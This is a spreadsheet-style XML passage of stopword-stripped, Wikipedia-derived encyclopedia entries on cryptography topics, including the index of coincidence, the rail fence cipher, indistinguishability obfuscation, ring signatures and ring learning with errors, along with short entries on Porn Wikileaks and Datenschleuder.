  <si>
    <t>porn wikileaks wiki website (pornwikileaks.com) contained personal information, including real names, 15,000 pornographic actors. information came patient database managed medical associates closed lawsuits caused leaks, clinic many pornographic film performers tested sexually transmitted diseases.the website received criticism performers kimberly kane stated, "most porn industry know behind porn wikileaks; hatred business shunned even repugnant porn." adult performer christian stated, "they posted real name, real names parents pictures them, home address telephone number, name picture phone number brother, picture cemetery grandfather recently passed away, mention saying hiv."in august 2019, porn wikileaks purchased bang bros, shut down; bang bros subsequently posted video pile hard drives fire. references</t>
  </si>
  <si>
    <t>Index of coincidence</t>
  </si>
  <si>
    <t>cryptography, coincidence counting technique (invented william friedman) putting texts side-by-side counting number times identical letters appear position texts. this count, either ratio total normalized dividing expected count random source model, known index coincidence, short. because letters natural language distributed evenly, higher texts would uniformly random text strings. what makes especially useful fact value change texts scrambled single-alphabet substitution cipher, allowing cryptanalyst quickly detect form encryption. calculation index coincidence provides measure likely draw matching letters randomly selecting letters given text. chance drawing given letter text (number times letter appears length text). chance drawing letter (without replacement) (appearances text length product values gives chance drawing letter twice row. find product letter appears text, products chance drawing kind. this probability normalized multiplying coefficient, typically english. {\displaystyle \mathbf {ic} =c\times \left({\left({{\frac {n_{\mathrm }}{n}}\times {\frac {n_{\mathrm }-1}{n-1}}}\right)+\left({{\frac {n_{\mathrm }}{n}}\times {\frac {n_{\mathrm }-1}{n-1}}}\right)+\cdots +\left({{\frac {n_{\mathrm }}{n}}\times {\frac {n_{\mathrm }-1}{n-1}}}\right)}\right)} normalizing coefficient english), number times letter appears text, length text. express index coincidence given letter-frequency distribution summation: {\displaystyle \mathbf {ic} ={\frac {\displaystyle \sum _{i=1}^{c}n_{i}(n_{i}-1)}{n(n-1)/c}}} length text frequencies integers) letters alphabet monocase english). necessarily products count number combinations elements taken time. (actually counts pair twice; extra factors occur numerator denominator formula thus cancel out.) each occurrences letter matches remaining occurrences letter. there total letter pairs entire text, probability match pair, assuming uniform random distribution characters (the "null model"; below). thus, formula gives ratio total number coincidences observed total number coincidences would expect null model.the expected average value computed relative letter frequencies source language: {\displaystyle \mathbf {ic} _{\mathrm {expected} }={\frac {\displaystyle \sum _{i=1}^{c}{f_{i}}^{2}}{1/c}}.} letters alphabet equally probable, expected index would 1.0. actual monographic telegraphic english text around 1.73, reflecting unevenness natural-language letter distributions. sometimes values reported without normalizing denominator, example 0.067 1.73/26 english; values called ("kappa-plaintext") rather ("kappa-random") used denote denominator (which expected coincidence rate uniform distribution alphabet, 0.0385=1/26 english). english plaintext generally fall somewhere range (normalized calculation). application index coincidence useful analysis natural-language plaintext analysis ciphertext (cryptanalysis). even ciphertext available testing plaintext letter identities disguised, coincidences ciphertext caused coincidences underlying plaintext. this technique used cryptanalyze vigenère cipher, example. repeating-key polyalphabetic cipher arranged matrix, coincidence rate within column usually highest width matrix multiple length, fact used determine length, first step cracking system. coincidence counting help determine texts written language using alphabet. (this technique used examine purported bible code). causal coincidence count texts distinctly higher accidental coincidence count texts different languages, texts using different alphabets, gibberish texts. why, imagine "alphabet" letters suppose "language", letter used time, letter used time. texts language laid side side, following pairs expected: overall, probability "coincidence" 62.5% (56.25% 6.25% bb). consider case messages encrypted using simple monoalphabetic substitution cipher replaces vice versa: overall probability coincidence situation 62.5% (6.25% 56.25% bb), exactly unencrypted "plaintext" case. effect, alphabet produced substitution uniform renaming original character identities, affect whether match. suppose message (say, second) encrypted using substitution cipher (a,b)→(b,a). following pairs expected: probability coincidence 37.5% (18.75% 18.75% bb). this noticeably lower probability same-language, same-alphabet texts used. evidently, coincidences likely frequent letters text same. principle applies real languages like english, certain letters, like occur much frequently letters—a fact used frequency analysis substitution ciphers. coincidences involving letter example, relatively likely. english texts compared, coincidence count higher english text foreign-language text used. easily imagined effect subtle. example, similar languages higher coincidence count dissimilar languages. also, hard generate random text frequency distribution similar real text, artificially raising coincidence count. nevertheless, technique used effectively identify texts likely contain meaningful information language using alphabet, discover periods repeating keys, uncover many kinds nonrandom phenomena within among ciphertexts. expected values various languages are: generalization description introduction index coincidence, related general concept correlation. various forms index coincidence devised; "delta" i.c. (given formula above) effect measures autocorrelation single distribution, whereas "kappa" i.c. used matching text strings. although applications constant factors {\displaystyle {\displaystyle ignored, general situations considerable value truly indexing i.c. value expected null hypothesis (usually: match uniform random symbol distribution), every situation expected value correlation 1.0. thus, form i.c. expressed ratio number coincidences actually observed number coincidences expected (according null model), using particular test setup. from foregoing, easy formula kappa i.c. {\displaystyle \mathbf {ic} ={\frac {\displaystyle \sum _{j=1}^{n}[a_{j}=b_{j}]}{n/c}},} {\displaystyle common aligned length texts bracketed term defined {\displaystyle letter text matches {\displaystyle letter text otherwise related concept, "bulge" distribution, measures discrepancy observed i.c. null value 1.0. number cipher alphabets used polyalphabetic cipher estimated dividing expected bulge delta i.c. single alphabet observed bulge message, although many cases (such repeating used) better techniques available. example practical illustration i.c., suppose intercepted following ciphertext message: qpwka lvrxc qzikg rbpfa eomfl jmsdz vdhxc xjyeb imtrq wnmea izrvk cvkvl xneic fzpzc zzhkm lvzvz izrrq wdkec hosny xxlsp mykvq xjtdc iomee xdqvs rxlrl kzhov (the grouping five characters telegraphic convention nothing actual word lengths.) suspecting english plaintext encrypted using vigenère cipher normal components short repeating keyword, consider ciphertext "stacked" number columns, example seven: qpwkalv rxcqzik grbpfae omfljms dzvdhxc xjyebim trqwn… size happens assumed number columns, letters within single column enciphered using letter, effect simple caesar cipher applied random selection english plaintext characters. corresponding ciphertext letters roughness frequency distribution similar english, although letter identities permuted (shifted constant amount corresponding letter). therefore, compute aggregate delta i.c. columns ("delta bar"), around 1.73. hand, incorrectly guessed size (number columns), aggregate delta i.c. around 1.00. compute delta i.c. assumed sizes ten: size likely five. actual size five, would expect width also report high i.c., since columns also corresponds simple caesar encipherment, confirm this. stack ciphertext five columns: qpwka lvrxc qzikg rbpfa eomfl jmsdz vdh… determine likely letter column considered separately, performing trial caesar decryption entire column possibilities letter, choosing letter produces highest correlation decrypted column letter frequencies relative letter frequencies normal english text. that correlation, need worry normalizing, readily computed {\displaystyle \mathbf {\chi =\sum _{i=1}^{c}n_{i}f_{i}} {\displaystyle n_{i}} observed column letter frequencies {\displaystyle f_{i}} relative letter frequencies english. when this, best-fit letters reported "every," recognize actual word, using vigenère decryption produces plaintext: mustc hange meeti ngloc ation fromb ridge tound erpas ssinc eenem yagen tsare belie vedto haveb eenas signe dtowa tchbr idges topme eting timeu nchan gedxx obtains: must change meeting location from bridge underpass since enemy agents believed have been assigned watch bridge stop meeting time unchanged word divisions restored obvious positions. "xx" evidently "null" characters used final group transmission. this entire procedure could easily packaged automated algorithm breaking ciphers. normal statistical fluctuation, algorithm occasionally make wrong choices, especially analyzing short ciphertext messages. references also kasiski examination riverbank publications topics cryptography</t>
  </si>
  <si>
    <t>Rail fence cipher</t>
  </si>
  <si>
    <t>rail fence cipher (also called zigzag cipher) classical type transposition cipher. derives name manner encryption performed, analogy fence built horizontal rails. encryption rail fence cipher, plaintext written downwards diagonally successive "rails" imaginary fence, moving bottom rail reached, rail reached, whole plaintext written out. ciphertext read rows. example, encrypt message discovered. once.' "rails", write text (note spaces punctuation omitted.) then read text horizontally ciphertext: wecruo erdsoeerntne aivdac decryption {\displaystyle number rails used encryption. observe plaintext written, sequence letter's vertical position rails varies repeating cycle. example (where {\displaystyle n=3} vertical position repeats period general sequence repeats period {\displaystyle 2(n-1)} {\displaystyle length string decrypted. suppose moment {\displaystyle multiple {\displaystyle 2(n-1)} {\displaystyle k={l \over {2(n-1)}}} begins splitting ciphertext strings length first last string {\displaystyle length intermediate string {\displaystyle example {\displaystyle l=24} {\displaystyle k=6} split ciphertext follows: wecruo erdsoeerntne aivdac write string separate line spaces letter first last line: then read plaintext first column, diagonally next column, {\displaystyle multiple {\displaystyle 2(n-1)} determination split ciphertext slightly complicated described above, basic approach same. alternatively, simplicity decrypting, plaintext extra letters make length multiple {\displaystyle 2(n-1)} ciphertext padded, either know willing brute-force number rails used, decrypt using following steps. above, {\displaystyle length string decrypted {\displaystyle number rails used encryption. variables, {\displaystyle {\displaystyle {\displaystyle x+1} number diagonals decrypted rail fence, {\displaystyle number empty spaces last diagonal. {\displaystyle 1={\frac {l+y}{n+((n-1)*x)}}} next solve {\displaystyle {\displaystyle algebraically, values smallest number possible. this easily done incrementing {\displaystyle denominator larger {\displaystyle simply solving {\displaystyle consider example cipher, modified rails instead w.........v.........o .e.......o.e.......t.n ..a.....c...r.....a...c ...r...s.....e...n.....e ....e.i.......d.u....... .....d.........r........ resulting cipher text eoetn acrac rsene eidu know {\displaystyle l=24} {\displaystyle n=6} solve equation above. {\displaystyle 1={\frac {24+y}{6+(5*x)}}} {\displaystyle 1={\frac {18+y}{5*x}}} simplify fraction. {\displaystyle 1={\frac {18+y}{5*4}}} solve {\displaystyle {\displaystyle 1={\frac {18+2}{20}}} solve {\displaystyle {\displaystyle n=6} {\displaystyle x=4} {\displaystyle y=2} rails, diagonals (4+1), empty spaces end. blocking empty spaces last diagonal, simply fill rail fence line line using ciphertext. cryptanalysis cipher's {\displaystyle number rails. {\displaystyle known, ciphertext decrypted using algorithm. values {\displaystyle equal greater {\displaystyle length ciphertext, usable, since ciphertext plaintext. therefore number usable keys low, allowing brute-force attack trying possible keys. result, rail-fence cipher considered weak. zigzag cipher term zigzag cipher refer rail fence cipher described above. however, also refer different type cipher described fletcher pratt secret urgent. "written ruling sheet paper vertical columns, letter head column. made letter message proper column, reading bottom sheet. letters head columns off, ruling erased message dots sent along recipient, who, knowing width columns arrangement letters top, reconstitutes diagram reads say." also transposition cipher scytale references helen fouché gaines, cryptanalysis, study ciphers solution, dover, 1956, isbn 0-486-20097-3 external links american cryptogram association black chamber page encrypting decrypting rail fence cipher rumkin page encrypting decrypting rail fence cipher cryptii page encrypting decypting rail fence cipher</t>
  </si>
  <si>
    <t>Indistinguishability obfuscation</t>
  </si>
  <si>
    <t>cryptography, indistinguishability obfuscation (abbreviated type software obfuscation defining property obfuscating programs compute mathematical function results programs cannot distinguished other. informally, obfuscation hides implementation program still allowing users formally, satisfies property obfuscations circuits size implement function computationally indistinguishable.indistinguishability obfuscation several interesting theoretical properties. firstly, "best-possible" obfuscation sense secret program hidden obfuscator also hidden io). secondly, used construct nearly entire gamut cryptographic primitives, including mundane ones public-key cryptography exotic ones deniable encryption functional encryption (which types cryptography no-one previously knew construct), notable exception collision-resistant hash function families. reason, referred "crypto-complete". lastly, unlike many kinds cryptography, indistinguishability obfuscation continues exist even p=np (though would constructed differently case), though necessarily imply exists unconditionally. though idea cryptographic software obfuscation around since 1996, indistinguishability obfuscation first proposed barak (2001), proved exists p=np case. p!=np case (which harder, also plausible), progress slower: garg (2013) proposed construction based computational hardness assumption relating multilinear maps, assumption later disproven. construction based "well-founded assumptions" (hardness assumptions well-studied cryptographers, thus widely assumed secure) wait jain, lin, sahai (2020). (even assumptions used 2020 proposal secure quantum computers.) currently known indistinguishability obfuscation candidates practical. measured 2017 paper, even obfuscating function outputs logical conjunction thirty-two boolean data type inputs produces program nearly dozen gigabytes large. formal definition {\displaystyle {\mathcal {io}}} uniform probabilistic polynomial-time algorithm. then {\displaystyle {\mathcal {io}}} called indistinguishability obfuscator satisfies following statements: completeness functionality: boolean circuit input length input {\displaystyle x\in \{0,1\}^{n}} indistinguishability: every pair circuits {\displaystyle c_{0},c_{1}} size implement functionality, distributions {\displaystyle \{{\mathcal {io}}(c_{0})\}} {\displaystyle \{{\mathcal {io}}(c_{1})\}} computationally indistinguishable. words, probabilistic polynomial-time adversary negligible function {\displaystyle \varepsilon (k)} (i.e., function eventually grows slower {\displaystyle 1/p(k)} polynomial that, every pair circuits {\displaystyle c_{0},c_{1}} size implement functionality, history origin idea came amit sahai 1996 notion zero-knowledge proof.in 2001, barak al., showing black-box obfuscation impossible, also proposed idea indistinguishability obfuscator, constructed inefficient one.although notion seemed relatively weak, goldwasser rothblum (2007) showed efficient indistinguishability obfuscator would best-possible obfuscator, best-possible obfuscator would indistinguishability obfuscator. (however, inefficient obfuscators, best-possible obfuscator exists unless polynomial hierarchy collapses second level.) candidate constructions barak (2001) proved inefficient indistinguishability obfuscator exists circuits; lexicographically first circuit computes function. holds, indistinguishability obfuscator exists, even though kind cryptography would also exist.a candidate construction provable security concrete hardness assumptions relating multilinear maps published garg (2013), assumption later invalidated. (previously, garg, gentry, halevi (2012) constructed candidate version multilinear based heuristic assumptions.) starting 2016, began explore constructions based less strict versions multilinear maps, constructing candidate based maps degree eventually candidate based maps degree finally, 2020, jain, lin, sahai proposed construction based symmetric external diffie-helman, learning errors, learning plus noise assumptions, well existence super-linear stretch pseudorandom generator function class nc0. (the existence pseudorandom generators (even sub-linear stretch) long-standing open problem 2006.) possible construction could broken quantum computing, alternative construction secure even (although latter relies less established security assumptions). practicality? there attempts implement benchmark candidates. example, 2017, obfuscation function {\displaystyle x_{1}\wedge x_{2}\wedge \dots \wedge x_{32}} security level bits took 23.5 minutes produce measured 11.6 evaluation time additionally, obfuscation advanced encryption standard encryption circuit security level bits would measure evaluation time years.an open-source software implementation candidate created 2015. mathematical details existence useful divide question existence using russell impagliazzo's "five worlds", five different hypothetical situations average-case complexity: algorithmica: case exists. heuristica: case problems easy average; exist. pessiland: case, {\displaystyle bpp\neq one-way functions exist; result, exist. minicrypt: case, one-way functions exist, secure public-key cryptography not; exist (because explicit constructions public-key cryptography one-way functions known). cryptomania: case, secure public-key cryptography exists; believed exist case. (the subcase cryptomania exist known obfustopia.) potential applications indistinguishability obfuscators, exist, could used enormous range cryptographic applications, much referred "central hub" cryptography, "crown jewel cryptography", "crypto-complete". concretely, indistinguishability obfuscator (with additional assumption existence one-way functions) could used construct following kinds cryptography: indistinguishability obfuscation programs model turing machines ind-cca-secure public-key cryptography short digital signatures ind-cca-secure encapsulation schemes perfectly zero-knowledge non-interactive zero-knowledge proofs succinct non-interactive arguments constant-round concurrent zero-knowledge protocols multilinear maps bounded polynomial degrees injective trapdoor functions fully homomorphic encryption witness encryption functional encryption secret sharing monotone language semi-honest oblivious transfer deniable encryption (both sender-deniable fully-deniable) multiparty, non-interactive exchange adaptively secure succinct garbled correlation intractable functions attribute-based encryption oblivious transfer traitor tracing graded encoding schemesadditionally, one-way functions exist, problems ppad complexity class provably hard.however, indistinguishability obfuscation cannot used construct every possible cryptographic protocol: example, black-box construction convert indistinguishability obfuscator collision-resistant hash function family, even trapdoor permutation, unless exponential loss security. also black-box obfuscation, stronger form obfuscation proven impossible references</t>
  </si>
  <si>
    <t>Indexed search</t>
  </si>
  <si>
    <t>indexed search, also called cutpoint method, algorithm discrete-distribution pseudo-random number sampling, invented chen asau 1974. references sources chen, asau, (1974). generating random variates empirical distribution". aiie transactions. (2): 163–166. doi:10.1080/05695557408974949. fishman,g.s. (1996) monte carlo. concepts, algorithms, applications. york: springer. ripley, (1987) stochastic simulation. wiley. isbn 0-471-81884-4</t>
  </si>
  <si>
    <t>Rip van Winkle cipher</t>
  </si>
  <si>
    <t>cryptography, winkle cipher provably secure cipher finite key, assuming attacker finite storage. cipher requires broadcaster (perhaps numbers station) publicly transmitting series random numbers. sender encrypts plaintext message xoring random numbers, holding length time time, sender finally transmits encrypted message. receiver holds random numbers length time soon receiver gets encrypted message, xors random numbers remembers transmitted ago, recover original plaintext message. delay represents "key" must securely communicated once. ueli maurer says original winkle cipher completely impractical, motivated approach provable security. sources j.l. massey ingemarsson. winkle cipher simple provably computationally secure cipher finite key. proc. ieee int. symp. information theory (abstracts), page 146, 1985.</t>
  </si>
  <si>
    <t>Datenschleuder</t>
  </si>
  <si>
    <t>datenschleuder. wissenschaftliche fachblatt datenreisende, literally translated data slingshot: scientific trade journal data voyagers, german hacker magazine published irregular intervals chaos computer club (ccc). topics include primarily political technical aspects digital world (freedom information, data privacy (data protection), closed-circuit television, personal privacy (personal rights), cryptography many more). datenschleuder first published 1984 also subscribed independently membership ccc. founder herwart holland moritz. (more back issues freely available internet well. current print paper format 216. editorial process carried internet, magazine printed distributed hamburg. issue march 2008 contained reproduction fingerprint wolfgang schäuble, interior minister germany time.the phreaking magazine youth international party line (yipl) (founded 1971) described model datenschleuder. also chaos computer club chaos digest (chaosd) references external links official website</t>
  </si>
  <si>
    <t>Datafly algorithm</t>
  </si>
  <si>
    <t>datafly algorithm algorithm providing anonymity medical data. algorithm developed latanya arvette sweeney 1997−98. anonymization achieved automatically generalizing, substituting, inserting, removing information appropriate without losing many details found within data. method used on-the-fly role-based security within institution, batch mode exporting data institution. organizations release receive medical data explicit identifiers—such name—removed, erroneous belief patient confidentiality maintained resulting data look anonymous. however remaining data used re-identify individuals linking matching data databases looking unique characteristics found fields records database itself. datafly algorithm criticized trying achieve anonymization overgeneralization. algorithm selects attribute greatest number distinct values generalize first. core algorithm outline datafly algorithm presented below.input: private table quasi-identifier ..., k-anonymity constraint domain generalization hierarchies dghai, 1,...,n accompanying functions fai, loss, limit percentage tuples suppressed. pt[id] unique identifiers keys tuple. output: generalization pt[qi] enforces k-anonymity assumes: loss algorithm datafly: construct frequency list containing unique sequences values across quasi-identifier along number occurrences sequence. freq expandable collapsible vector elements initially. each element form frequency, t[id] [id] t[id] and, frequency |sid|. therefore, freq also accessible table (qi, frequency, sid).2. {\displaystyle \gets total {\displaystyle \gets total |pt| do3.1 freq[pos] {\displaystyle \gets t[qi], occurs, t[qi] [qi], ],__, {\displaystyle \not freq; occurs |pt| |pt[qi] {t[qi]}|; and, t[id] {\displaystyle \gets pt[id] t[id] }3.2 {\displaystyle \gets total {\displaystyle \gets total occurs// make solution generalizing attribute number distinct values// suppressing allowed number tuples.4. belowk {\displaystyle \gets {\displaystyle \gets |freq| do5.1 count {\displaystyle \gets freq[pos]5.2 count do5.2.1 belowk {\displaystyle \gets belowk count6. belowk note. loss |pt| k.6.1 freq {\displaystyle \gets generalize(freq)6.2 step else do// assert: number tuples suppress freq loss |pt|7.1 freq {\displaystyle \gets suppress(freq, belowk )7.2 {\displaystyle \gets reconstruct(freq)8. return mgt. references external links details datafly algorithm</t>
  </si>
  <si>
    <t>Ring signature</t>
  </si>
  <si>
    <t>cryptography, ring signature type digital signature performed member users keys. therefore, message signed ring signature endorsed someone particular people. security properties ring signature computationally infeasible determine set's members' keys used produce signature. ring signatures similar group signatures differ ways: first, revoke anonymity individual signature; second, users used signing without additional setup. ring signatures invented rivest, shamir, yael tauman kalai, introduced asiacrypt 2001. name, ring signature, comes ring-like structure signature algorithm. definition suppose entities public/private pairs, (p1, s1), (p2, s2), ..., (pn, sn). party compute ring signature message input ..., pn). anyone check validity ring signature given public keys involved, ..., ring signature properly computed, pass check. hand, hard anyone create valid ring signature message without knowing private keys set. applications modifications original paper, rivest, shamir, tauman described ring signatures leak secret. instance, ring signature could used provide anonymous signature high-ranking white house official", without revealing official signed message. ring signatures right application anonymity ring signature cannot revoked, group ring signature improvised. another application, also described original paper, deniable signatures. here sender recipient message form group ring signature, signature valid recipient, anyone else unsure whether recipient sender actual signer. thus, signature convincing, cannot transferred beyond intended recipient. there various works, introducing features based different assumptions: threshold ring signatures unlike standard "t-out-of-n" threshold signature, users collaborate decrypt message, variant ring signature requires users cooperate signing protocol. namely, parties (i1, ..., compute n)-ring signature, message, input si1, si2, ..., sit, ..., pn). linkable ring signatures property linkability allows determine whether signatures produced member (under private key). identity signer nevertheless preserved. possible applications offline e-cash system. traceable ring signature addition previous scheme public signer revealed issue signatures private key). e-voting system implemented using protocol. efficiency most proposed algorithms asymptotic output size {\displaystyle o(n)} i.e., size resulting signature increases linearly size input (number public keys). that means schemes impracticable real cases sufficiently large {\displaystyle (for example, e-voting millions participants). application relatively small median input size estimate acceptable. cryptonote implements {\displaystyle o(n)} ring signature scheme fujisaki suzuki payments achieve sender's untraceability. more efficient algorithms appeared recently. there schemes sublinear size signature, well constant size. implementation original scheme original paper describes based ring signature scheme, well based rabin signatures. they define keyed "combining function" {\displaystyle c_{k,v}(y_{1},y_{2},\dots ,y_{n})} takes {\displaystyle initialization value {\displaystyle list arbitrary values {\displaystyle y_{1},\dots y_{n}} {\displaystyle y_{i}} defined {\displaystyle g_{i}(x_{i})} {\displaystyle g_{i}} trap-door function (i.e. public case based ring signatures). function {\displaystyle c_{k,v}(y_{1},y_{2},\dots ,y_{n})} called ring equation, defined below. equation based symmetric encryption function {\displaystyle e_{k}} {\displaystyle c_{k,v}(y_{1},y_{2},\dots ,y_{n})=e_{k}(y_{n}\oplus e_{k}(y_{n-1}\oplus e_{k}(\dots \oplus e_{k}(y_{1}\oplus v)\dots )))} outputs single value {\displaystyle forced equal {\displaystyle equation {\displaystyle v=c_{k,v}(y_{1},y_{2},\dots ,y_{n})} solved long least {\displaystyle y_{i}} extension {\displaystyle x_{i}} freely chosen. under assumptions rsa, implies knowledge least inverses trap door functions {\displaystyle g_{i}^{-1}} (i.e. private key), since {\displaystyle g_{i}^{-1}(y_{i})=x_{i}} signature generation generating ring signature involves steps. plaintext signified {\displaystyle ring's public keys {\displaystyle p_{1},p_{2},\dots ,p_{n}} calculate {\displaystyle k={\mathcal {h}}(m)} using cryptographic hash function. this step assumes random oracle {\displaystyle {\mathcal {h}}} since {\displaystyle used {\displaystyle e_{k}} pick random glue value {\displaystyle pick random {\displaystyle x_{i}} ring members {\displaystyle x_{s}} calculated using signer's private key), calculate corresponding {\displaystyle y_{i}=g_{i}(x_{i})} solve ring equation {\displaystyle y_{s}} calculate {\displaystyle x_{s}} using signer's private key: {\displaystyle x_{s}=g_{s}^{-1}(y_{s})} ring signature {\displaystyle (2n+1)} -tuple {\displaystyle (p_{1},p_{2},\dots ,p_{n};v;x_{1},x_{2},\dots ,x_{n})} signature verification signature verification involves three steps. apply public trap door {\displaystyle x_{i}} {\displaystyle y_{i}=g_{i}(x_{i})} calculate symmetric {\displaystyle k={\mathcal {h}}(m)} verify ring equation holds {\displaystyle c_{k,v}(y_{1},y_{2},\dots ,y_{n})=v} python implementation here python implementation original paper using rsa. requires 3rd-party module pycryptodome. sign verify messages ring users: cryptocurrencies cryptonote technology uses ring signatures. first implemented bytecoin. shadowcash cryptocurrency shadowcash uses traceable ring signature anonymize sender transaction. however, originally implemented incorrectly, resulting partial de-anonymization shadowcash first implementation february 2016 monero research labs researcher, shen noether. luckily one-time keys system affected bug, sender anonymity compromised receiver anonymity remained intact. patch submitted timely fashion resolve bug. monero between january 2017 october 2018, monero used ring confidential transaction technology obfuscate transaction amounts blockchain. this allowed sender recipient funds know true quantity sent. currency since switched bulletproofs. references</t>
  </si>
  <si>
    <t>Ring learning with errors</t>
  </si>
  <si>
    <t>post-quantum cryptography, ring learning errors (rlwe) computational problem serves foundation cryptographic algorithms, newhope, designed protect cryptanalysis quantum computers also provide basis homomorphic encryption. public-key cryptography relies construction mathematical problems believed hard solve information available, easy solve information used problem construction known. some problems sort currently used cryptography risk attack sufficiently large quantum computers ever built, resistant problems sought. homomorphic encryption form encryption allows computation ciphertext, arithmetic numeric values stored encrypted database. rlwe properly called learning errors rings simply larger learning errors (lwe) problem specialized polynomial rings finite fields. because presumed difficulty solving rlwe problem even quantum computer, rlwe based cryptography form fundamental base public-key cryptography future integer factorization discrete logarithm problem served base public cryptography since early 1980s. important feature basing cryptography ring learning errors problem fact solution rlwe problem used solve np-hard shortest vector problem (svp) lattice polynomial-time reduction problem rlwe problem presented). background security modern cryptography, particular public-key cryptography, based assumed intractability solving certain computational problems size problem large enough instance problem solved chosen randomly. classic example used since 1970s integer factorization problem. believed computationally intractable factor product prime numbers prime numbers large enough chosen random. 2015 research factorization product 384-bit primes product 512-bit primes. integer factorization forms basis widely used cryptographic algorithm. ring learning errors (rlwe) problem built arithmetic polynomials coefficients finite field. typical polynomial {\textstyle a(x)} expressed {\displaystyle a(x)=a_{0}+a_{1}x+a_{2}x^{2}+\ldots +a_{n-2}x^{n-2}+a_{n-1}x^{n-1}} polynomials added multiplied usual fashion. rlwe context coefficients polynomials operations involving coefficients done finite field, typically field {\textstyle \mathbf /q\mathbf =\mathbf _{q}} prime integer {\textstyle polynomials finite field operations addition multiplication forms infinite polynomial ring {\textstyle \mathbf _{q}[x]} rlwe context works finite quotient ring infinite ring. quotient ring typically finite quotient (factor) ring formed reducing polynomials {\textstyle \mathbf _{q}[x]} modulo irreducible polynomial {\textstyle \phi (x)} this finite quotient ring written {\displaystyle \mathbf _{q}[x]/\phi (x)} though many authors write {\displaystyle \mathbf _{q}[x]/\phi (x)} degree polynomial {\displaystyle \phi (x)} {\textstyle quotient ring becomes ring polynomials degree less {\displaystyle modulo {\displaystyle \phi (x)} coefficients {\displaystyle f_{q}} values {\textstyle {\textstyle together polynomial {\displaystyle \phi (x)} partially define mathematical context rlwe problem. another concept necessary rlwe problem idea "small" polynomials respect norm. typical norm used rlwe problem known infinity norm (also called uniform norm). infinity norm polynomial simply largest coefficient polynomial coefficients viewed integers. hence, {\displaystyle ||a(x)||_{\infty }=b} states infinity norm polynomial {\displaystyle a(x)} {\displaystyle thus {\displaystyle largest coefficient {\displaystyle a(x)} final concept necessary understand rlwe problem generation random polynomials {\displaystyle \mathbf _{q}[x]/\phi (x)} generation "small" polynomials random polynomial easily generated simply randomly sampling {\displaystyle coefficients polynomial {\displaystyle \mathbf _{q}} {\displaystyle \mathbf _{q}} typically represented {\displaystyle \{-(q-1)/2,...,-1,0,1,...,(q-1)/2\}} randomly generating "small" polynomial done generating coefficients polynomial {\displaystyle \mathbf _{q}} either guarantees makes likely small coefficients. when {\displaystyle prime integer, common ways this: using uniform sampling coefficients small polynomial uniformly sampled small coefficients. {\textstyle integer much less {\textstyle randomly choose coefficients set: {\textstyle \{-b,-b+1,-b+2,\ldots ,-2,-1,0,1,2,\ldots ,b-2,b-1,b\}} polynomial small respect bound {\textstyle using discrete gaussian sampling value {\textstyle coefficients polynomial randomly chosen sampling {\textstyle \{-(q-1)/2,\ldots ,(q-1)/2\}} according discrete gaussian distribution mean {\displaystyle distribution parameter {\textstyle \sigma references describe full detail accomplished. complicated uniform sampling allows proof security algorithm. paper "sampling discrete gaussians lattice-based cryptography constrained device" dwarakanath galbraith provide overview problem. rlwe problem rlwe problem stated different ways: "search" version "decision" version. both begin construction. {\displaystyle a_{i}(x)} random known polynomials {\displaystyle \mathbf _{q}[x]/\phi (x)} coefficients {\displaystyle \mathbf _{q}} {\displaystyle e_{i}(x)} small random unknown polynomials relative bound {\displaystyle ring {\displaystyle \mathbf _{q}[x]/\phi (x)} {\displaystyle s(x)} small unknown polynomial relative bound {\displaystyle ring {\displaystyle \mathbf _{q}[x]/\phi (x)} {\displaystyle b_{i}(x)=(a_{i}(x)\cdot s(x))+e_{i}(x)} .the search version entails finding unknown polynomial {\displaystyle s(x)} given list polynomial pairs {\displaystyle (a_{i}(x),b_{i}(x))} decision version problem stated follows. given list polynomial pairs {\displaystyle (a_{i}(x),b_{i}(x))} determine whether {\displaystyle b_{i}(x)} polynomials constructed {\displaystyle b_{i}(x)=(a_{i}(x)\cdot s(x))+e_{i}(x)} generated randomly {\displaystyle \mathbf _{q}[x]/\phi (x)} coefficients {\displaystyle \mathbf _{q}} difficulty problem parameterized choice quotient polynomial {\displaystyle \phi (x)} degree {\displaystyle field {\displaystyle \mathbf _{q}} smallness bound {\displaystyle many rlwe based public algorithms private pair small polynomials {\displaystyle s(x)} {\displaystyle e(x)} corresponding public pair polynomials {\displaystyle a(x)} selected randomly {\displaystyle \mathbf _{q}[x]/\phi (x)} polynomial {\displaystyle t(x)=(a(x)\cdot s(x))+e(x)} given {\displaystyle a(x)} {\displaystyle t(x)} computationally infeasible recover polynomial {\displaystyle s(x)} security reduction cases polynomial {\displaystyle \phi (x)} cyclotomic polynomial, difficulty solving search version rlwe problem equivalent finding short vector (but necessarily shortest vector) ideal lattice formed elements {\displaystyle \mathbf [x]/\phi (x)} represented integer vectors. this problem commonly known approximate shortest vector problem (α-svp) problem finding vector shorter times shortest vector. authors proof equivalence write: "... give quantum reduction approximate worst case) ideal lattices {\displaystyle \mathbf search version ring-lwe, goal recover secret {\displaystyle s\in \mathbf _{q}} (with high probability, {\displaystyle arbitrarily many noisy products."in quote, ring {\displaystyle \mathbf {\displaystyle \mathbf [x]/\phi (x)} ring {\displaystyle \mathbf _{q}} {\displaystyle \mathbf _{q}[x]/\phi (x)} α-svp regular lattices known np-hard work daniele micciancio 2001, although values required reduction general learning errors problem. however, proof show difficulty α-svp ideal lattices equivalent average α-svp. rather proof α-svp instances hard solve ideal lattices rlwe problem hard random instances.regarding difficulty shortest vector problems ideal lattices, researcher michael schneider writes, algorithm making special structure ideal lattices. widely believed solving (and lattice problems) ideal lattices hard regular lattices." difficulty problems regular lattices provably np-hard. there are, however, minority researchers believe ideal lattices share security properties regular lattices.peikert believes security equivalences make rlwe problem good basis future cryptography. writes: "there mathematical proof break cryptosystem (within formal attack model) random instances able solve underlying lattice problem worst case" (emphasis original). rlwe cryptography major advantage rlwe based cryptography original learning errors (lwe) based cryptography found size public private keys. rlwe keys roughly square root keys lwe. bits security rlwe cryptographic algorithm would public keys around 7000 bits length. corresponding scheme would require public keys million bits level security. hand, rlwe keys larger keys sizes currently used public algorithms like elliptic curve diffie-hellman require public sizes 3072 bits bits, respectively, achieve 128-bit level security. from computational standpoint, however, rlwe algorithms shown equal better existing public systems.three groups rlwe cryptographic algorithms exist: ring learning errors exchanges (rlwe-kex) fundamental idea using ring exchange proposed filed university cincinnati 2011 jintai ding. basic idea comes associativity matrix multiplications, errors used provide security. paper appeared 2012 provisional patent application filed 2012. 2014, peikert presented transport scheme following basic idea ding's, idea sending additional signal rounding ding's construction also utilized. rlwe version classic variant diffie-hellman exchange later published zhang security exchanges directly related problem finding approximate short vectors ideal lattice. ring learning errors signature (rlwe-sig) rlwe version classic feige–fiat–shamir identification protocol created converted digital signature 